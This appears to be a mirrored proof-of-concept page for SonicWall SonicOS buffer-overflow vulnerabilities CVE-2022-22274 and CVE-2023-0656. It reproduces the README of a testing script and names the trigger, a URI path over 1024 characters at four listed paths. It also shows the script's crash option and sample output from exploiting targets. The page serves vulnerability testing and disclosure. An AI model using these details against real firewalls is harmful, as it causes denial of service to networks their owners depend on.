Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-22274 PoC — SonicOS 缓冲区错误漏洞

Source
https://github.com/BishopFox/CVE-2022-22274_CVE-2023-0656
Associated Vulnerability
Title:SonicOS 缓冲区错误漏洞 (CVE-2022-22274)
Description:Sonicwall SonicWall SonicOS是美国SonicWall(Sonicwall)公司的一套专为SonicWall防火墙设备设计的操作系统。 SonicOS存在安全漏洞,该漏洞允许未经身份验证的远程攻击者导致拒绝服务 (DoS) 或可能导致防火墙中的代码执行。
Readme
# SonicWall NGFW CVE-2022-22274 & CVE-2023-0656

![example gif](example.gif)

On March 24, 2022, SonicWall released an [advisory](https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0003) with the following details:

> A Stack-based buffer overflow vulnerability in the SonicOS via HTTP request allows a remote unauthenticated attacker to cause Denial of Service (DoS) or potentially results in code execution in the firewall.

> NOTE: This vulnerability ONLY impacts the "web management" interface, the SonicOS SSLVPN interface is not impacted.

On March 2, 2023, SonicWall released another, similar, [advisory](https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0004):

> A Stack-based buffer overflow vulnerability in the SonicOS allows a remote unauthenticated attacker to cause Denial of Service (DoS), which could cause an impacted firewall to crash.

> NOTE: This vulnerability ONLY impacts the "web management" interface, the SonicOS SSLVPN interface is not impacted.

Both issues are related to the same vulnerable code pattern and use the same exploit payload, but are triggered at different URI paths.

## Description

The buffer overflow is triggered via an HTTP request with a URI path longer than 1024 characters. CVE-2022-22274 can be exploited at `/resources/` or at the Advanced Threat Protection URI path (`/atp/` if enabled or `//` if disabled). CVE-2023-0656 can be exploited at `/stats/` or `/Security_Services`.

This repository contains a proof-of-concept script to test a target for exploitability at all four URI paths. It performs a safe test by default, but has the ability to exploit the bugs and crash the target as well.

*NOTE: In its default configuration, 3 consecutive crashes within a short period of time will cause SonicOS to reboot the device into debug mode and it will be unreachable until an administrator brings it back online. Use responsibly!*

## Usage

Install Python 3 and run `python -m pip install -y argparse`.

```
usage: poc.py [-h] [-t] [-x {1,2,3,4,5}] [-s] target

positional arguments:
  target                hostname[:port] (port defaults to 443)

options:
  -h, --help            show this help message and exit
  -t, --test            safely test for vulnerability (default action)
  -x {1,2,3,4,5}, --exploit {1,2,3,4,5}
                        exploit the target (trigger a crash). 1=/resources/ 2=// 3=/atp/ 4=/stats/ 5=/Security_Services
  -s, --skip-header-check
                        skip initial check for SonicWALL response header
```

## Examples

Test a vulnerable target:

```
$ ./poc.py 192.168.50.29
[*] Checking https://192.168.50.29:443
[+] Confirmed target is running SonicOS
[*] Testing CVE-2022-22274 at /resources/
[+] Target looks vulnerable! (redirected)
[*] Testing CVE-2022-22274 at //
[+] Target looks vulnerable! (redirected)
[*] Testing CVE-2022-22274 at /atp/
[-] Target does not appear to be affected (HTTP 404)
[*] Testing CVE-2023-0656 at /stats/
[+] Target looks vulnerable! (redirected)
[*] Testing CVE-2023-0656 at /Security_Services
[+] Target looks vulnerable! (redirected)
```

Exploit a vulnerable target:

```
$ ./poc.py -x 1 192.168.50.29
[*] Checking https://192.168.50.29:443
[+] Confirmed target is running SonicOS
[*] Triggering exploit at /resources/
[+] Exploit succeeded! (target unavailable)
```

Test and exploit a patched target:

```
$ ./poc.py -tx 4 192.168.50.31
[*] Checking https://192.168.50.31:443
[+] Confirmed target is running SonicOS
[*] Testing CVE-2022-22274 at /resources/
[-] Target appears to be patched (empty response)
[*] Testing CVE-2022-22274 at //
[-] Target appears to be patched (empty response)
[*] Testing CVE-2022-22274 at /atp/
[-] Target does not appear to be affected (HTTP 404)
[*] Testing CVE-2023-0656 at /stats/
[-] Target appears to be patched (empty response)
[*] Testing CVE-2023-0656 at /Security_Services
[-] Target appears to be patched (empty response)
[*] Triggering exploit at /stats/
[-] Exploit failed (target responded)
```

## License

This project is licensed under the [GNU GPL 3.0](LICENSE) license.
File Snapshot

 [4.0K]  /data/pocs/c3d01accc87d16a947eab2993b2282e43c666f2c
├── [ 79K]  example.gif
├── [ 34K]  LICENSE
├── [5.0K]  poc.py
└── [4.0K]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.